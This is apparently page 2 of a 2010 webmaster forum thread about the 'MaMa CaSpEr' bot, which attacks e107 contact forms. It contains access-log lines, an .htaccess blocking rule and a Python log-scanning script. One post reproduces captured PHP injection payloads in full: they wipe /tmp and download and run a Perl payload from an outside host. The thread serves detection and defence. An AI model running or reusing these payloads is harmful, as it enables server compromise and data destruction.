Search Engine Spider and User Agent Identification Forum

This 41 message thread spans 2 pages (this is page 2).
casper bot search attempts to infect sites
user agent changing almost daily
dstiles | msg:4160993 | 10:47 pm on Jun 28, 2010 (gmt 0)

Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seem to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?


dstiles | msg:4167452 | 10:33 pm on Jul 9, 2010 (gmt 0)

Not really feasible to post here, Bill. 260 lines, some of which are very long (total over 30 Kbytes), much of it BASE64 and a lot of tightly-packed URLs. It'd be a nightmare to disentangle. I'm willing to email it to known members if they sticky me, though.

Megaclinium | msg:4168070 | 1:39 pm on Jul 11, 2010 (gmt 0)

I don't have .PHP in use.

My log processing program separates unknown bots from known bots that I haven't banned (such as google, yahoo, picsearch, etc) and from legitimate traffic based on characteristics.

From this I found several recent .PHP hack attacks from all over.

Inspired by various posters I've since created the directories the hack attacks tried to find (various creative variations on php progs and others), then took large meaningless files and renamed them main.php.

While I've banned the original ranges they came from, if they repeat from another server, they'll get a mouthful of fur to choke on.

To quote a current movie: off with their heads, screamed the red queen!

caribguy | msg:4168148 | 7:48 pm on Jul 11, 2010 (gmt 0)

Why waste your bandwidth on those idiots? Simply 301 redirect to 127.0.0.1

dstiles | msg:4168174 | 8:55 pm on Jul 11, 2010 (gmt 0)

I return a 403 for any page request that includes the extension (amongst others) .php. There is no way I would give them the folders/files they ask for: I would be creating them at the rate of dozens per day! And to no purpose except to encourage them.

I doubt they actually read the files anyway: they are just POSTing to them. Anyone noticed if they abort the read (206, was it?)? I haven't really checked the site logs, only the security logs which don't record that.

Pfui | msg:4172330 | 7:27 am on Jul 18, 2010 (gmt 0)

Finally saw one of the variations on a no-php server. Undeterred by 403s: 8 hits in 2 secs. Alternated attempted POSTs to one specific HTML page (but it removed the suffix & appended a nonexistent dir: /e107) with hits to the also nonexistent: /e107

ns*.eforienett.ro
kmccrew Bot Search

robots.txt? NO

FWIW: The only servers that make a beeline only to the same specific page are Tor.

v1rich | msg:4172838 | 3:14 pm on Jul 19, 2010 (gmt 0)

I've been seeing this today as well

Here are some of the posts, URL-decoded:

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 468
Content-Type: text/xml
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo'casper';echo`cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp`;echo'kae';exit;/*</name></value></param></params></methodCall>

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]

POST /rentals/propertydetail.aspx?PropertyName=contact HTTP/1.1
Connection: TE, close
Content-Length: 1241
Content-Type: application/x-www-form-urlencoded
Host: REMOVED
TE: deflate,gzip;q=0.3
User-Agent: MaMa CaSpEr
X-REWRITE-URL: /property//contact.php

send-contactus=1
&author_name=[php]passthru('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');system('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');shell_exec('cd /var/tmp;cd /tmp;rm -fr *;wget [allsib.info...] -O bsd.xp;lwp-download [allsib.info...] -O bsd.xp;curl -O [allsib.info...] -O bsd.xp;perl bsd.xp');;die();[/php]

Wizcrafts | msg:4181617 | 5:35 am on Aug 4, 2010 (gmt 0)

I am seeing lots of MaMa CaSpEr user agent attacks, ongoing for over two weeks now. Fortunately, I block POST attempts that they are trying to exploit. Ex:

POST /blogs//contact.php HTTP/1.1" 403 512 "-" "MaMa CaSpEr"

Apparently, the bot can't tell that I use Perl, not PHP for my blog.

Wizcrafts | msg:4181833 | 2:56 pm on Aug 4, 2010 (gmt 0)

These attacks are associated with Indonesian hackers using the e107 ByroeNet scanner. The Casper user agents are hard coded into the "ByroeNet" scanner dated from June 17, 2010.

I found much of this information on multiple searches, but it is best detailed here: [doc.emergingthreats.net...] - as captured in their honeypots and logs.

Bill; I hope that link is acceptable. It is an authority site.

Web_Savvy | msg:4202371 | 7:32 pm on Sep 15, 2010 (gmt 0)

Well, it still continues:

We maintain our own internal security (as well as access) logs (so that no one could easily exploit the standard ones).

In the last few hours, we've recorded dozens of hits from:

IP: 77.79.246.81
UA: Casper Bot Search

HTH

Wizcrafts | msg:4202398 | 8:05 pm on Sep 15, 2010 (gmt 0)

The Casper bot has just changed its name today, to CyBer.

91.213.117.193 - - [15/Sep/2010:05:36:08 -0600] "POST //contact.php HTTP/1.1" 403 550 "-" "MaMa CyBer"

The attacking IP is an unconfigured server owned by a web hosting company in the Ukraine.

My .htaccess solution, from the get-go, has been:

RewriteCond %{HTTP_USER_AGENT} ^MaMa\ .+$ [NC]
RewriteRule .* - [F]

Allow the path to your custom 403 document, if any, in the RewriteRule, as a replacement for .*

Example:

RewriteRule !^403\.(s?html|php)$ - [F]

Jonesy | msg:4206979 | 11:30 pm on Sep 25, 2010 (gmt 0)

I've seen nothing of this for the last 10 days.
Then, today:

80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/b3016_preamp.html/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.190 - - [25/Sep/2010:04:44:10 -0400] "POST /contact.php HTTP/1.1" 404 3466 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
80.72.93.nnn - - [25/Sep/2010:04:44:10 -0400] "POST /W3DHJ/b3016_preamp.html%20%20/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"


The "nnn" were all the same: CXC
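As an added example (not code posted by anyone in this thread), the following Python script applies the traits described in these posts to Apache combined-format log lines: the same ^MaMa\ .+$ test as the RewriteCond quoted above, a POST to any .php path on a site that serves no PHP (the 403 approach dstiles describes), and the /e107 probe Pfui reported. The sample log lines are constructed and use RFC 5737 documentation addresses; the script also shows that the posted user-agent rule alone does not catch the "Casper Bot Search" and "kmccrew Bot Search" agents seen elsewhere in the thread.

```python
import re

# Constructed sample lines in Apache combined log format, modelled on the
# entries quoted in this thread; IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2010:04:44:09 -0400] "POST /W3DHJ/b3016_preamp.html%20%20/contact.php HTTP/1.1" 404 1968 "-" "MaMa CaSpEr"
192.0.2.11 - - [15/Sep/2010:05:36:08 -0600] "POST //contact.php HTTP/1.1" 403 550 "-" "MaMa CyBer"
192.0.2.12 - - [15/Sep/2010:06:01:00 -0600] "POST /contact.php HTTP/1.1" 403 550 "-" "Casper Bot Search"
192.0.2.13 - - [18/Jul/2010:07:20:00 +0000] "POST /e107 HTTP/1.1" 404 1968 "-" "kmccrew Bot Search"
198.51.100.7 - - [25/Sep/2010:09:00:00 -0400] "GET /rentals/index.html HTTP/1.1" 200 4021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Same test as the posted RewriteCond: ^MaMa\ .+$ with the [NC] flag.
UA_RULE = re.compile(r"^MaMa .+$", re.IGNORECASE)

def matched_by_posted_rule(ua):
    """True when the .htaccess rule quoted in the thread would answer 403."""
    return UA_RULE.match(ua) is not None

def classify(line, site_serves_php=False):
    """Return (ip, ua, reason) for a line showing a trait described in the
    thread, else None: MaMa agent, POST to .php where there is no PHP, /e107 probe."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined-format; leave for a human to look at
    ip, ua, method, path = m["ip"], m["ua"], m["method"], m["path"]
    if matched_by_posted_rule(ua):
        return (ip, ua, "ua-rule")
    if method == "POST" and not site_serves_php and ".php" in path.lower():
        return (ip, ua, "php-post-on-no-php-site")
    if re.match(r"^/e107(/|$)", path):
        return (ip, ua, "e107-probe")
    return None

def scan(log_text, site_serves_php=False):
    """Apply classify() to every line and keep only the flagged ones."""
    hits = (classify(l, site_serves_php) for l in log_text.splitlines())
    return [h for h in hits if h is not None]

if __name__ == "__main__":
    for ip, ua, reason in scan(SAMPLE_LOG):
        print(f"{ip:<14} {reason:<24} {ua}")
```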

Jonesy
